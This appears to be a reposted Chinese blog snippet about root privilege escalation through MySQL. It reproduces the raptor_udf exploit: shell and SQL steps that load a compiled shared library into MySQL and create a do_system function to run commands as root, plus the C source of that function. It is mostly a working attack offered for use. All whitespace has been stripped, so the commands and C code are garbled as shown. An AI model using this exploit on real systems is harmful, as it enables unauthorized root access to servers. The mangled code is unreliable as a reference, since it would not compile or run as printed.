Linux mysql root 提权

*Usage:
*$id
*uid=500(raptor)gid=500(raptor)groups=500(raptor)
*$gcc-g-craptor_udf.c
*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc
*$mysql-uroot-p
*Enterpassword:
*[...]
*mysql>usemysql;
*mysql>createtablefoo(lineblob);
*mysql>insertintofoovalues(load_file('/home/raptor/raptor_udf.so'));
*mysql>select*fromfoointodumpfile'/usr/lib/raptor_udf.so';
*mysql>createfunctiondo_systemreturnsintegersoname'raptor_udf.so';
*mysql>select*frommysql.func;
*+-----------+-----+---------------+----------+
*|name|ret|dl|type|
*+-----------+-----+---------------+----------+
*|do_system|2|raptor_udf.so|function|
*+-----------+-----+---------------+----------+
*mysql>selectdo_system('id>/tmp/out;chownraptor.raptor/tmp/out');
*mysql>\!sh
*sh-2.05b$cat/tmp/out
*uid=0(root)gid=0(root)groups=0(root),1(bin),2(daemon),3(sys),4(adm)
*[...]
*/

raptor_udf.c:

#include<stdio.h>
#include<stdlib.h>

enumItem_result{STRING_RESULT,REAL_RESULT,INT_RESULT,ROW_RESULT};

typedefstructst_udf_args{
unsignedintarg_count;//numberofarguments
enumItem_result*arg_type;//pointertoitem_result
char**args;//pointertoarguments
unsignedlong*lengths;//lengthofstringargs
char*maybe_null;//1formaybe_nullargs
}UDF_ARGS;

typedefstructst_udf_init{
charmaybe_null;//1iffunccanreturnNULL
unsignedintdecimals;//forrealfunctions
unsignedlongmax_length;//forstringfunctions
char*ptr;//freeptrforfuncdata
charconst_item;//0ifresultisconstant
}UDF_INIT;

intdo_system(UDF_INIT*initid,UDF_ARGS*args,char*is_null,char*error)
{
if(args->arg_count!=1)
return(0);

system(args->args[0]);

return(0);
}

你可能感兴趣的:(linux)